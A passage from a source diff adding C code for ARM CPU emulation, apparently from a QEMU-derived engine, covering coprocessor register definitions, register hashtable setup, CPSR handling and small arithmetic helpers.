ARM_CP_STATE_BOTH, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.dbgbcr[i]), + NULL, NULL,dbgbcr_write, NULL,raw_write + }, + REGINFO_SENTINEL + }; + define_arm_cp_regs(cpu, dbgregs); + } + + for (i = 0; i < wrps + 1; i++) { + ARMCPRegInfo dbgregs[] = { + { "DBGWVR", 14,0,i, 2,0,6, ARM_CP_STATE_BOTH, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.dbgwvr[i]), + NULL, NULL,dbgwvr_write, NULL,raw_write + }, + { "DBGWCR", 14,0,i, 
2,0,7, ARM_CP_STATE_BOTH, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.dbgwcr[i]), + NULL, NULL,dbgwcr_write, NULL,raw_write + }, + REGINFO_SENTINEL + }; + define_arm_cp_regs(cpu, dbgregs); + } +} + +void register_cp_regs_for_features(ARMCPU *cpu) +{ + /* Register all the coprocessor registers based on feature bits */ + CPUARMState *env = &cpu->env; + if (arm_feature(env, ARM_FEATURE_M)) { + /* M profile has no coprocessor registers */ + return; + } + + define_arm_cp_regs(cpu, cp_reginfo); + if (!arm_feature(env, ARM_FEATURE_V8)) { + /* Must go early as it is full of wildcards that may be + * overridden by later definitions. + */ + define_arm_cp_regs(cpu, not_v8_cp_reginfo); + } + + if (arm_feature(env, ARM_FEATURE_V6)) { + /* The ID registers all have impdef reset values */ + ARMCPRegInfo v6_idregs[] = { + { "ID_PFR0", 0,0,1, 3,0,0, ARM_CP_STATE_BOTH, + ARM_CP_CONST, PL1_R, NULL, cpu->id_pfr0 }, + { "ID_PFR1", 0,0,1, 3,0,1, ARM_CP_STATE_BOTH, + ARM_CP_CONST, PL1_R, NULL, cpu->id_pfr1 }, + { "ID_DFR0", 0,0,1, 3,0,2, ARM_CP_STATE_BOTH, + ARM_CP_CONST, PL1_R, NULL, cpu->id_dfr0 }, + { "ID_AFR0", 0,0,1, 3,0,3, ARM_CP_STATE_BOTH, + ARM_CP_CONST, PL1_R, NULL, cpu->id_afr0 }, + { "ID_MMFR0", 0,0,1, 3,0,4, ARM_CP_STATE_BOTH, + ARM_CP_CONST, PL1_R, NULL, cpu->id_mmfr0 }, + { "ID_MMFR1", 0,0,1, 3,0,5, ARM_CP_STATE_BOTH, + ARM_CP_CONST, PL1_R, NULL, cpu->id_mmfr1 }, + { "ID_MMFR2", 0,0,1, 3,0,6, ARM_CP_STATE_BOTH, + ARM_CP_CONST, PL1_R, NULL, cpu->id_mmfr2 }, + { "ID_MMFR3", 0,0,1, 3,0,7, ARM_CP_STATE_BOTH, + ARM_CP_CONST, PL1_R, NULL, cpu->id_mmfr3 }, + { "ID_ISAR0", 0,0,2, 3,0,0, ARM_CP_STATE_BOTH, + ARM_CP_CONST, PL1_R, NULL, cpu->id_isar0 }, + { "ID_ISAR1", 0,0,2, 3,0,1, ARM_CP_STATE_BOTH, + ARM_CP_CONST, PL1_R, NULL, cpu->id_isar1 }, + { "ID_ISAR2", 0,0,2, 3,0,2, ARM_CP_STATE_BOTH, + ARM_CP_CONST, PL1_R, NULL, cpu->id_isar2 }, + { "ID_ISAR3", 0,0,2, 3,0,3, ARM_CP_STATE_BOTH, + ARM_CP_CONST, PL1_R, NULL, cpu->id_isar3 }, + { "ID_ISAR4", 0,0,2, 3,0,4, 
ARM_CP_STATE_BOTH, + ARM_CP_CONST, PL1_R, NULL, cpu->id_isar4 }, + { "ID_ISAR5", 0,0,2, 3,0,5, ARM_CP_STATE_BOTH, + ARM_CP_CONST, PL1_R, NULL, cpu->id_isar5 }, + /* 6..7 are as yet unallocated and must RAZ */ + { "ID_ISAR6", 15,0,2, 0,0,6, 0, + ARM_CP_CONST, PL1_R, NULL, 0 }, + { "ID_ISAR7", 15,0,2, 0,0,7, 0, + ARM_CP_CONST, PL1_R, NULL, 0 }, + REGINFO_SENTINEL + }; + define_arm_cp_regs(cpu, v6_idregs); + define_arm_cp_regs(cpu, v6_cp_reginfo); + } else { + define_arm_cp_regs(cpu, not_v6_cp_reginfo); + } + if (arm_feature(env, ARM_FEATURE_V6K)) { + define_arm_cp_regs(cpu, v6k_cp_reginfo); + } + if (arm_feature(env, ARM_FEATURE_V7MP)) { + define_arm_cp_regs(cpu, v7mp_cp_reginfo); + } + if (arm_feature(env, ARM_FEATURE_V7)) { + ARMCPRegInfo clidr = { + "CLIDR", 0,0,0, 3,1,1, ARM_CP_STATE_BOTH, + ARM_CP_CONST, PL1_R, NULL, cpu->clidr + }; + /* v7 performance monitor control register: same implementor + * field as main ID register, and we implement only the cycle + * count register. + */ +#ifndef CONFIG_USER_ONLY + ARMCPRegInfo pmcr = { + "PMCR", 15,9,12, 0,0,0, 0, + ARM_CP_IO | ARM_CP_NO_MIGRATE, PL0_RW, NULL, 0, offsetoflow32(CPUARMState, cp15.c9_pmcr), + pmreg_access, NULL,pmcr_write, NULL,raw_write, + }; + ARMCPRegInfo pmcr64 = { + "PMCR_EL0", 0,9,12, 3,3,0, ARM_CP_STATE_AA64, + ARM_CP_IO, PL0_RW, NULL, cpu->midr & 0xff000000, offsetof(CPUARMState, cp15.c9_pmcr), + pmreg_access, NULL,pmcr_write, NULL,raw_write, + }; + define_one_arm_cp_reg(cpu, &pmcr); + define_one_arm_cp_reg(cpu, &pmcr64); +#endif + define_one_arm_cp_reg(cpu, &clidr); + define_arm_cp_regs(cpu, v7_cp_reginfo); + define_debug_regs(cpu); + } else { + define_arm_cp_regs(cpu, not_v7_cp_reginfo); + } + if (arm_feature(env, ARM_FEATURE_V8)) { + /* AArch64 ID registers, which all have impdef reset values */ + ARMCPRegInfo v8_idregs[] = { + { "ID_AA64PFR0_EL1", 0,0,4, 3,0,0, ARM_CP_STATE_AA64, + ARM_CP_CONST, PL1_R, NULL, cpu->id_aa64pfr0 }, + { "ID_AA64PFR1_EL1", 0,0,4, 3,0,1, ARM_CP_STATE_AA64, + 
ARM_CP_CONST, PL1_R, NULL, cpu->id_aa64pfr1}, + { "ID_AA64DFR0_EL1", 0,0,5, 3,0,0, ARM_CP_STATE_AA64, + ARM_CP_CONST, PL1_R, NULL, + /* We mask out the PMUVer field, because we don't currently + * implement the PMU. Not advertising it prevents the guest + * from trying to use it and getting UNDEFs on registers we + * don't implement. + */ + cpu->id_aa64dfr0 & ~0xf00 }, + { "ID_AA64DFR1_EL1", 0,0,5, 3,0,1, ARM_CP_STATE_AA64, + ARM_CP_CONST, PL1_R, NULL, cpu->id_aa64dfr1 }, + { "ID_AA64AFR0_EL1", 0,0,5, 3,0,4, ARM_CP_STATE_AA64, + ARM_CP_CONST, PL1_R, NULL, cpu->id_aa64afr0 }, + { "ID_AA64AFR1_EL1", 0,0,5, 3,0,5, ARM_CP_STATE_AA64, + ARM_CP_CONST, PL1_R, NULL, cpu->id_aa64afr1 }, + { "ID_AA64ISAR0_EL1", 0,0,6, 3,0,0, ARM_CP_STATE_AA64, + ARM_CP_CONST, PL1_R, NULL, cpu->id_aa64isar0 }, + { "ID_AA64ISAR1_EL1", 0,0,6, 3,0,1, ARM_CP_STATE_AA64, + ARM_CP_CONST, PL1_R, NULL, cpu->id_aa64isar1 }, + { "ID_AA64MMFR0_EL1", 0,0,7, 3,0,0, ARM_CP_STATE_AA64, + ARM_CP_CONST, PL1_R, NULL, cpu->id_aa64mmfr0 }, + { "ID_AA64MMFR1_EL1", 0,0,7, 3,0,1, ARM_CP_STATE_AA64, + ARM_CP_CONST, PL1_R, NULL, cpu->id_aa64mmfr1 }, + { "MVFR0_EL1", 0,0,3, 3,0,0, ARM_CP_STATE_AA64, + ARM_CP_CONST, PL1_R, NULL, cpu->mvfr0 }, + { "MVFR1_EL1", 0,0,3, 3,0,1, ARM_CP_STATE_AA64, + ARM_CP_CONST, PL1_R, NULL, cpu->mvfr1 }, + { "MVFR2_EL1", 0,0,3, 3,0,2, ARM_CP_STATE_AA64, + ARM_CP_CONST, PL1_R, NULL, cpu->mvfr2 }, + REGINFO_SENTINEL + }; + ARMCPRegInfo rvbar = { + "RVBAR_EL1", 0,12,0, 3,0,2, ARM_CP_STATE_AA64, + ARM_CP_CONST, PL1_R, NULL, cpu->rvbar + }; + define_one_arm_cp_reg(cpu, &rvbar); + define_arm_cp_regs(cpu, v8_idregs); + define_arm_cp_regs(cpu, v8_cp_reginfo); + } + if (arm_feature(env, ARM_FEATURE_EL2)) { + define_arm_cp_regs(cpu, v8_el2_cp_reginfo); + } else { + /* If EL2 is missing but higher ELs are enabled, we need to + * register the no_el2 reginfos. 
+ */ + if (arm_feature(env, ARM_FEATURE_EL3)) { + define_arm_cp_regs(cpu, v8_el3_no_el2_cp_reginfo); + } + } + if (arm_feature(env, ARM_FEATURE_EL3)) { + define_arm_cp_regs(cpu, v8_el3_cp_reginfo); + } + if (arm_feature(env, ARM_FEATURE_MPU)) { + /* These are the MPU registers prior to PMSAv6. Any new + * PMSA core later than the ARM946 will require that we + * implement the PMSAv6 or PMSAv7 registers, which are + * completely different. + */ + assert(!arm_feature(env, ARM_FEATURE_V6)); + define_arm_cp_regs(cpu, pmsav5_cp_reginfo); + } else { + define_arm_cp_regs(cpu, vmsa_cp_reginfo); + } + if (arm_feature(env, ARM_FEATURE_THUMB2EE)) { + define_arm_cp_regs(cpu, t2ee_cp_reginfo); + } + if (arm_feature(env, ARM_FEATURE_GENERIC_TIMER)) { + define_arm_cp_regs(cpu, generic_timer_cp_reginfo); + } + if (arm_feature(env, ARM_FEATURE_VAPA)) { + define_arm_cp_regs(cpu, vapa_cp_reginfo); + } + if (arm_feature(env, ARM_FEATURE_CACHE_TEST_CLEAN)) { + define_arm_cp_regs(cpu, cache_test_clean_cp_reginfo); + } + if (arm_feature(env, ARM_FEATURE_CACHE_DIRTY_REG)) { + define_arm_cp_regs(cpu, cache_dirty_status_cp_reginfo); + } + if (arm_feature(env, ARM_FEATURE_CACHE_BLOCK_OPS)) { + define_arm_cp_regs(cpu, cache_block_ops_cp_reginfo); + } + if (arm_feature(env, ARM_FEATURE_OMAPCP)) { + define_arm_cp_regs(cpu, omap_cp_reginfo); + } + if (arm_feature(env, ARM_FEATURE_STRONGARM)) { + define_arm_cp_regs(cpu, strongarm_cp_reginfo); + } + if (arm_feature(env, ARM_FEATURE_XSCALE)) { + define_arm_cp_regs(cpu, xscale_cp_reginfo); + } + if (arm_feature(env, ARM_FEATURE_DUMMY_C15_REGS)) { + define_arm_cp_regs(cpu, dummy_c15_cp_reginfo); + } + if (arm_feature(env, ARM_FEATURE_LPAE)) { + define_arm_cp_regs(cpu, lpae_cp_reginfo); + } + /* Slightly awkwardly, the OMAP and StrongARM cores need all of + * cp15 crn=0 to be writes-ignored, whereas for other cores they should + * be read-only (ie write causes UNDEF exception). 
+ */ + { + ARMCPRegInfo id_pre_v8_midr_cp_reginfo[] = { + /* Pre-v8 MIDR space. + * Note that the MIDR isn't a simple constant register because + * of the TI925 behaviour where writes to another register can + * cause the MIDR value to change. + * + * Unimplemented registers in the c15 0 0 0 space default to + * MIDR. Define MIDR first as this entire space, then CTR, TCMTR + * and friends override accordingly. + */ + { "MIDR", 15,0,0, 0,0,CP_ANY, 0, + ARM_CP_OVERRIDE, PL1_R, NULL, cpu->midr, offsetof(CPUARMState, cp15.c0_cpuid), + NULL, NULL,arm_cp_write_ignore, NULL,raw_write, }, + /* crn = 0 op1 = 0 crm = 3..7 : currently unassigned; we RAZ. */ + { "DUMMY", + 15,0,3, 0,0,CP_ANY, 0, + ARM_CP_CONST, PL1_R, NULL, 0 }, + { "DUMMY", + 15,0,4, 0,0,CP_ANY, 0, + ARM_CP_CONST, PL1_R, NULL, 0 }, + { "DUMMY", + 15,0,5, 0,0,CP_ANY, 0, + ARM_CP_CONST, PL1_R, NULL, 0 }, + { "DUMMY", + 15,0,6, 0,0,CP_ANY, 0, + ARM_CP_CONST, PL1_R, NULL, 0 }, + { "DUMMY", + 15,0,7, 0,0,CP_ANY, 0, + ARM_CP_CONST, PL1_R, NULL, 0 }, + REGINFO_SENTINEL + }; + ARMCPRegInfo id_v8_midr_cp_reginfo[] = { + /* v8 MIDR -- the wildcard isn't necessary, and nor is the + * variable-MIDR TI925 behaviour. Instead we have a single + * (strictly speaking IMPDEF) alias of the MIDR, REVIDR. 
+ */ + { "MIDR_EL1", 0,0,0, 3,0,0, ARM_CP_STATE_BOTH, + ARM_CP_CONST, PL1_R, NULL, cpu->midr }, + { "REVIDR_EL1", 0,0,0, 3,0,6, ARM_CP_STATE_BOTH, + ARM_CP_CONST, PL1_R, NULL, cpu->midr }, + REGINFO_SENTINEL + }; + ARMCPRegInfo id_cp_reginfo[] = { + /* These are common to v8 and pre-v8 */ + { "CTR", 15,0,0, 0,0,1, 0, + ARM_CP_CONST, PL1_R, NULL, cpu->ctr }, + { "CTR_EL0", 0,0,0, 3,3,1, ARM_CP_STATE_AA64, + ARM_CP_CONST, PL0_R, NULL, cpu->ctr, 0, + ctr_el0_access, }, + /* TCMTR and TLBTR exist in v8 but have no 64-bit versions */ + { "TCMTR", 15,0,0, 0,0,2, 0, + ARM_CP_CONST, PL1_R, NULL, 0 }, + { "TLBTR", 15,0,0, 0,0,3, 0, + ARM_CP_CONST, PL1_R, NULL, 0 }, + REGINFO_SENTINEL + }; + ARMCPRegInfo crn0_wi_reginfo = { + "CRN0_WI", 15,0,CP_ANY, 0,CP_ANY,CP_ANY, 0, + ARM_CP_NOP | ARM_CP_OVERRIDE, PL1_W, + }; + if (arm_feature(env, ARM_FEATURE_OMAPCP) || + arm_feature(env, ARM_FEATURE_STRONGARM)) { + ARMCPRegInfo *r; + /* Register the blanket "writes ignored" value first to cover the + * whole space. Then update the specific ID registers to allow write + * access, so that they ignore writes rather than causing them to + * UNDEF. 
+ */ + define_one_arm_cp_reg(cpu, &crn0_wi_reginfo); + for (r = id_pre_v8_midr_cp_reginfo; + r->type != ARM_CP_SENTINEL; r++) { + r->access = PL1_RW; + } + for (r = id_cp_reginfo; r->type != ARM_CP_SENTINEL; r++) { + r->access = PL1_RW; + } + } + if (arm_feature(env, ARM_FEATURE_V8)) { + define_arm_cp_regs(cpu, id_v8_midr_cp_reginfo); + } else { + define_arm_cp_regs(cpu, id_pre_v8_midr_cp_reginfo); + } + define_arm_cp_regs(cpu, id_cp_reginfo); + } + + if (arm_feature(env, ARM_FEATURE_MPIDR)) { + define_arm_cp_regs(cpu, mpidr_cp_reginfo); + } + + if (arm_feature(env, ARM_FEATURE_AUXCR)) { + ARMCPRegInfo auxcr = { + "ACTLR_EL1", 0,1,0, 3,0,1, ARM_CP_STATE_BOTH, + ARM_CP_CONST, PL1_RW, NULL, cpu->reset_auxcr + }; + define_one_arm_cp_reg(cpu, &auxcr); + } + + if (arm_feature(env, ARM_FEATURE_CBAR)) { + if (arm_feature(env, ARM_FEATURE_AARCH64)) { + /* 32 bit view is [31:18] 0...0 [43:32]. */ + uint32_t cbar32 = (extract64(cpu->reset_cbar, 18, 14) << 18) + | extract64(cpu->reset_cbar, 32, 12); + ARMCPRegInfo cbar_reginfo[] = { + { "CBAR", 15,15,0, 0,4,0, 0, + ARM_CP_CONST, PL1_R, NULL, cpu->reset_cbar }, + { "CBAR_EL1", 0,15,3, 3,1,0, ARM_CP_STATE_AA64, + ARM_CP_CONST, PL1_R, NULL, cbar32 }, + REGINFO_SENTINEL + }; + /* We don't implement a r/w 64 bit CBAR currently */ + assert(arm_feature(env, ARM_FEATURE_CBAR_RO)); + define_arm_cp_regs(cpu, cbar_reginfo); + } else { + ARMCPRegInfo cbar = { + "CBAR", 15,15,0, 0,4,0, 0, + 0, PL1_R|PL3_W, NULL, cpu->reset_cbar, offsetof(CPUARMState, cp15.c15_config_base_address) + }; + if (arm_feature(env, ARM_FEATURE_CBAR_RO)) { + cbar.access = PL1_R; + cbar.fieldoffset = 0; + cbar.type = ARM_CP_CONST; + } + define_one_arm_cp_reg(cpu, &cbar); + } + } + + /* Generic registers whose values depend on the implementation */ + { + ARMCPRegInfo sctlr = { + "SCTLR", 0,1,0, 3,0,0, ARM_CP_STATE_BOTH, + 0, PL1_RW, NULL, cpu->reset_sctlr, offsetof(CPUARMState, cp15.c1_sys), + NULL, NULL,sctlr_write, NULL,raw_write, + }; + if (arm_feature(env, 
ARM_FEATURE_XSCALE)) { + /* Normally we would always end the TB on an SCTLR write, but Linux + * arch/arm/mach-pxa/sleep.S expects two instructions following + * an MMU enable to execute from cache. Imitate this behaviour. + */ + sctlr.type |= ARM_CP_SUPPRESS_TB_END; + } + define_one_arm_cp_reg(cpu, &sctlr); + } +} + +ARMCPU *cpu_arm_init(struct uc_struct *uc, const char *cpu_model) +{ + return ARM_CPU(uc, cpu_generic_init(uc, TYPE_ARM_CPU, cpu_model)); +} + +void arm_cpu_register_gdb_regs_for_features(ARMCPU *cpu) +{ +#if 0 + CPUState *cs = CPU(cpu); + CPUARMState *env = &cpu->env; + + if (arm_feature(env, ARM_FEATURE_AARCH64)) { + gdb_register_coprocessor(cs, aarch64_fpu_gdb_get_reg, + aarch64_fpu_gdb_set_reg, + 34, "aarch64-fpu.xml", 0); + } else if (arm_feature(env, ARM_FEATURE_NEON)) { + gdb_register_coprocessor(cs, vfp_gdb_get_reg, vfp_gdb_set_reg, + 51, "arm-neon.xml", 0); + } else if (arm_feature(env, ARM_FEATURE_VFP3)) { + gdb_register_coprocessor(cs, vfp_gdb_get_reg, vfp_gdb_set_reg, + 35, "arm-vfp3.xml", 0); + } else if (arm_feature(env, ARM_FEATURE_VFP)) { + gdb_register_coprocessor(cs, vfp_gdb_get_reg, vfp_gdb_set_reg, + 19, "arm-vfp.xml", 0); + } +#endif +} + +/* Sort alphabetically by type name, except for "any". 
*/ +#if 0 +static void arm_cpu_list_entry(gpointer data, gpointer user_data) +{ + ObjectClass *oc = data; + CPUListState *s = user_data; + const char *typename; + char *name; + + typename = object_class_get_name(oc); + name = g_strndup(typename, strlen(typename) - strlen("-" TYPE_ARM_CPU)); + (*s->cpu_fprintf)(s->file, " %s\n", + name); + g_free(name); +} +#endif + +void arm_cpu_list(FILE *f, fprintf_function cpu_fprintf) +{ +#if 0 + CPUListState s = { + .file = f, + .cpu_fprintf = cpu_fprintf, + }; + GSList *list; + + list = object_class_get_list(TYPE_ARM_CPU, false); + list = g_slist_sort(list, arm_cpu_list_compare); + (*cpu_fprintf)(f, "Available CPUs:\n"); + g_slist_foreach(list, arm_cpu_list_entry, &s); + g_slist_free(list); +#ifdef CONFIG_KVM + /* The 'host' CPU type is dynamically registered only if KVM is + * enabled, so we have to special-case it here: + */ + (*cpu_fprintf)(f, " host (only available in KVM mode)\n"); +#endif +#endif +} + +static void add_cpreg_to_hashtable(ARMCPU *cpu, const ARMCPRegInfo *r, + void *opaque, int state, + int crm, int opc1, int opc2) +{ + /* Private utility function for define_one_arm_cp_reg_with_opaque(): + * add a single reginfo struct to the hash table. + */ + uint32_t *key = g_new(uint32_t, 1); + ARMCPRegInfo *r2 = g_memdup(r, sizeof(ARMCPRegInfo)); + int is64 = (r->type & ARM_CP_64BIT) ? 1 : 0; + if (r->state == ARM_CP_STATE_BOTH && state == ARM_CP_STATE_AA32) { + /* The AArch32 view of a shared register sees the lower 32 bits + * of a 64 bit backing field. It is not migratable as the AArch64 + * view handles that. AArch64 also handles reset. + * We assume it is a cp15 register if the .cp field is left unset. 
+ */ + if (r2->cp == 0) { + r2->cp = 15; + } + r2->type |= ARM_CP_NO_MIGRATE; + r2->resetfn = arm_cp_reset_ignore; +#ifdef HOST_WORDS_BIGENDIAN + if (r2->fieldoffset) { + r2->fieldoffset += sizeof(uint32_t); + } +#endif + } + if (state == ARM_CP_STATE_AA64) { + /* To allow abbreviation of ARMCPRegInfo + * definitions, we treat cp == 0 as equivalent to + * the value for "standard guest-visible sysreg". + * STATE_BOTH definitions are also always "standard + * sysreg" in their AArch64 view (the .cp value may + * be non-zero for the benefit of the AArch32 view). + */ + if (r->cp == 0 || r->state == ARM_CP_STATE_BOTH) { + r2->cp = CP_REG_ARM64_SYSREG_CP; + } + *key = ENCODE_AA64_CP_REG(r2->cp, r2->crn, crm, + r2->opc0, opc1, opc2); + } else { + *key = ENCODE_CP_REG(r2->cp, is64, r2->crn, crm, opc1, opc2); + } + if (opaque) { + r2->opaque = opaque; + } + /* reginfo passed to helpers is correct for the actual access, + * and is never ARM_CP_STATE_BOTH: + */ + r2->state = state; + /* Make sure reginfo passed to helpers for wildcarded regs + * has the correct crm/opc1/opc2 for this reg, not CP_ANY: + */ + r2->crm = crm; + r2->opc1 = opc1; + r2->opc2 = opc2; + /* By convention, for wildcarded registers only the first + * entry is used for migration; the others are marked as + * NO_MIGRATE so we don't try to transfer the register + * multiple times. Special registers (ie NOP/WFI) are + * never migratable. + */ + if ((r->type & ARM_CP_SPECIAL) || + ((r->crm == CP_ANY) && crm != 0) || + ((r->opc1 == CP_ANY) && opc1 != 0) || + ((r->opc2 == CP_ANY) && opc2 != 0)) { + r2->type |= ARM_CP_NO_MIGRATE; + } + + /* Overriding of an existing definition must be explicitly + * requested. 
+ */ + if (!(r->type & ARM_CP_OVERRIDE)) { + ARMCPRegInfo *oldreg; + oldreg = g_hash_table_lookup(cpu->cp_regs, key); + if (oldreg && !(oldreg->type & ARM_CP_OVERRIDE)) { + fprintf(stderr, "Register redefined: cp=%d %d bit " + "crn=%d crm=%d opc1=%d opc2=%d, " + "was %s, now %s\n", r2->cp, 32 + 32 * is64, + r2->crn, r2->crm, r2->opc1, r2->opc2, + oldreg->name, r2->name); + g_assert_not_reached(); + } + } + g_hash_table_insert(cpu->cp_regs, key, r2); +} + + +void define_one_arm_cp_reg_with_opaque(ARMCPU *cpu, + const ARMCPRegInfo *r, void *opaque) +{ + /* Define implementations of coprocessor registers. + * We store these in a hashtable because typically + * there are less than 150 registers in a space which + * is 16*16*16*8*8 = 262144 in size. + * Wildcarding is supported for the crm, opc1 and opc2 fields. + * If a register is defined twice then the second definition is + * used, so this can be used to define some generic registers and + * then override them with implementation specific variations. + * At least one of the original and the second definition should + * include ARM_CP_OVERRIDE in its type bits -- this is just a guard + * against accidental use. + * + * The state field defines whether the register is to be + * visible in the AArch32 or AArch64 execution state. If the + * state is set to ARM_CP_STATE_BOTH then we synthesise a + * reginfo structure for the AArch32 view, which sees the lower + * 32 bits of the 64 bit register. + * + * Only registers visible in AArch64 may set r->opc0; opc0 cannot + * be wildcarded. AArch64 registers are always considered to be 64 + * bits; the ARM_CP_64BIT* flag applies only to the AArch32 view of + * the register, if any. + */ + int crm, opc1, opc2, state; + int crmmin = (r->crm == CP_ANY) ? 0 : r->crm; + int crmmax = (r->crm == CP_ANY) ? 15 : r->crm; + int opc1min = (r->opc1 == CP_ANY) ? 0 : r->opc1; + int opc1max = (r->opc1 == CP_ANY) ? 7 : r->opc1; + int opc2min = (r->opc2 == CP_ANY) ? 
0 : r->opc2; + int opc2max = (r->opc2 == CP_ANY) ? 7 : r->opc2; + /* 64 bit registers have only CRm and Opc1 fields */ + assert(!((r->type & ARM_CP_64BIT) && (r->opc2 || r->crn))); + /* op0 only exists in the AArch64 encodings */ + assert((r->state != ARM_CP_STATE_AA32) || (r->opc0 == 0)); + /* AArch64 regs are all 64 bit so ARM_CP_64BIT is meaningless */ + assert((r->state != ARM_CP_STATE_AA64) || !(r->type & ARM_CP_64BIT)); + /* The AArch64 pseudocode CheckSystemAccess() specifies that op1 + * encodes a minimum access level for the register. We roll this + * runtime check into our general permission check code, so check + * here that the reginfo's specified permissions are strict enough + * to encompass the generic architectural permission check. + */ + if (r->state != ARM_CP_STATE_AA32) { + int mask = 0; + switch (r->opc1) { + case 0: case 1: case 2: + /* min_EL EL1 */ + mask = PL1_RW; + break; + case 3: + /* min_EL EL0 */ + mask = PL0_RW; + break; + case 4: + /* min_EL EL2 */ + mask = PL2_RW; + break; + case 5: + /* unallocated encoding, so not possible */ + assert(false); + break; + case 6: + /* min_EL EL3 */ + mask = PL3_RW; + break; + case 7: + /* min_EL EL1, secure mode only (we don't check the latter) */ + mask = PL1_RW; + break; + default: + /* broken reginfo with out-of-range opc1 */ + assert(false); + break; + } + /* assert our permissions are not too lax (stricter is fine) */ + assert((r->access & ~mask) == 0); + } + + /* Check that the register definition has enough info to handle + * reads and writes if they are permitted. 
+ */ + if (!(r->type & (ARM_CP_SPECIAL|ARM_CP_CONST))) { + if (r->access & PL3_R) { + assert(r->fieldoffset || r->readfn); + } + if (r->access & PL3_W) { + assert(r->fieldoffset || r->writefn); + } + } + /* Bad type field probably means missing sentinel at end of reg list */ + assert(cptype_valid(r->type)); + for (crm = crmmin; crm <= crmmax; crm++) { + for (opc1 = opc1min; opc1 <= opc1max; opc1++) { + for (opc2 = opc2min; opc2 <= opc2max; opc2++) { + for (state = ARM_CP_STATE_AA32; + state <= ARM_CP_STATE_AA64; state++) { + if (r->state != state && r->state != ARM_CP_STATE_BOTH) { + continue; + } + add_cpreg_to_hashtable(cpu, r, opaque, state, + crm, opc1, opc2); + } + } + } + } +} + +void define_arm_cp_regs_with_opaque(ARMCPU *cpu, + const ARMCPRegInfo *regs, void *opaque) +{ + /* Define a whole list of registers */ + const ARMCPRegInfo *r; + for (r = regs; r->type != ARM_CP_SENTINEL; r++) { + define_one_arm_cp_reg_with_opaque(cpu, r, opaque); + } +} + +const ARMCPRegInfo *get_arm_cp_reginfo(GHashTable *cpregs, uint32_t encoded_cp) +{ + return g_hash_table_lookup(cpregs, &encoded_cp); +} + +void arm_cp_write_ignore(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + /* Helper coprocessor write function for write-ignore registers */ +} + +uint64_t arm_cp_read_zero(CPUARMState *env, const ARMCPRegInfo *ri) +{ + /* Helper coprocessor write function for read-as-zero registers */ + return 0; +} + +void arm_cp_reset_ignore(CPUARMState *env, const ARMCPRegInfo *opaque) +{ + /* Helper coprocessor reset function for do-nothing-on-reset registers */ +} + +static int bad_mode_switch(CPUARMState *env, int mode) +{ + /* Return true if it is not valid for us to switch to + * this CPU mode (ie all the UNPREDICTABLE cases in + * the ARM ARM CPSRWriteByInstr pseudocode). 
+ */ + switch (mode) { + case ARM_CPU_MODE_USR: + case ARM_CPU_MODE_SYS: + case ARM_CPU_MODE_SVC: + case ARM_CPU_MODE_ABT: + case ARM_CPU_MODE_UND: + case ARM_CPU_MODE_IRQ: + case ARM_CPU_MODE_FIQ: + return 0; + case ARM_CPU_MODE_MON: + return !arm_is_secure(env); + default: + return 1; + } +} + +uint32_t cpsr_read(CPUARMState *env) +{ + int ZF; + ZF = (env->ZF == 0); + return env->uncached_cpsr | (env->NF & 0x80000000) | (ZF << 30) | + (env->CF << 29) | ((env->VF & 0x80000000) >> 3) | (env->QF << 27) + | (env->thumb << 5) | ((env->condexec_bits & 3) << 25) + | ((env->condexec_bits & 0xfc) << 8) + | (env->GE << 16) | (env->daif & CPSR_AIF); +} + +void cpsr_write(CPUARMState *env, uint32_t val, uint32_t mask) +{ + if (mask & CPSR_NZCV) { + env->ZF = (~val) & CPSR_Z; + env->NF = val; + env->CF = (val >> 29) & 1; + env->VF = (val << 3) & 0x80000000; + } + if (mask & CPSR_Q) + env->QF = ((val & CPSR_Q) != 0); + if (mask & CPSR_T) + env->thumb = ((val & CPSR_T) != 0); + if (mask & CPSR_IT_0_1) { + env->condexec_bits &= ~3; + env->condexec_bits |= (val >> 25) & 3; + } + if (mask & CPSR_IT_2_7) { + env->condexec_bits &= 3; + env->condexec_bits |= (val >> 8) & 0xfc; + } + if (mask & CPSR_GE) { + env->GE = (val >> 16) & 0xf; + } + + env->daif &= ~(CPSR_AIF & mask); + env->daif |= val & CPSR_AIF & mask; + + if ((env->uncached_cpsr ^ val) & mask & CPSR_M) { + if (bad_mode_switch(env, val & CPSR_M)) { + /* Attempt to switch to an invalid mode: this is UNPREDICTABLE. + * We choose to ignore the attempt and leave the CPSR M field + * untouched. 
+ */ + mask &= ~CPSR_M; + } else { + switch_mode(env, val & CPSR_M); + } + } + mask &= ~CACHED_CPSR_BITS; + env->uncached_cpsr = (env->uncached_cpsr & ~mask) | (val & mask); +} + +/* Sign/zero extend */ +uint32_t HELPER(sxtb16)(uint32_t x) +{ + uint32_t res; + res = (uint16_t)(int8_t)x; + res |= (uint32_t)(int8_t)(x >> 16) << 16; + return res; +} + +uint32_t HELPER(uxtb16)(uint32_t x) +{ + uint32_t res; + res = (uint16_t)(uint8_t)x; + res |= (uint32_t)(uint8_t)(x >> 16) << 16; + return res; +} + +uint32_t HELPER(clz_arm)(uint32_t x) +{ + return clz32(x); +} + +int32_t HELPER(sdiv)(int32_t num, int32_t den) +{ + if (den == 0) + return 0; + if (num == INT_MIN && den == -1) + return INT_MIN; + return num / den; +} + +uint32_t HELPER(udiv)(uint32_t num, uint32_t den) +{ + if (den == 0) + return 0; + return num / den; +} + +uint32_t HELPER(rbit)(uint32_t x) +{ + x = ((x & 0xff000000) >> 24) + | ((x & 0x00ff0000) >> 8) + | ((x & 0x0000ff00) << 8) + | ((x & 0x000000ff) << 24); + x = ((x & 0xf0f0f0f0) >> 4) + | ((x & 0x0f0f0f0f) << 4); + x = ((x & 0x88888888) >> 3) + | ((x & 0x44444444) >> 1) + | ((x & 0x22222222) << 1) + | ((x & 0x11111111) << 3); + return x; +} + +#if defined(CONFIG_USER_ONLY) + +int arm_cpu_handle_mmu_fault(CPUState *cs, vaddr address, int rw, + int mmu_idx) +{ + ARMCPU *cpu = ARM_CPU(NULL, cs); + CPUARMState *env = &cpu->env; + + env->exception.vaddress = address; + if (rw == 2) { + cs->exception_index = EXCP_PREFETCH_ABORT; + } else { + cs->exception_index = EXCP_DATA_ABORT; + } + return 1; +} + +/* These should probably raise undefined insn exceptions. 
 */
/* User-mode stub: v7M special-register writes cannot occur here, so any
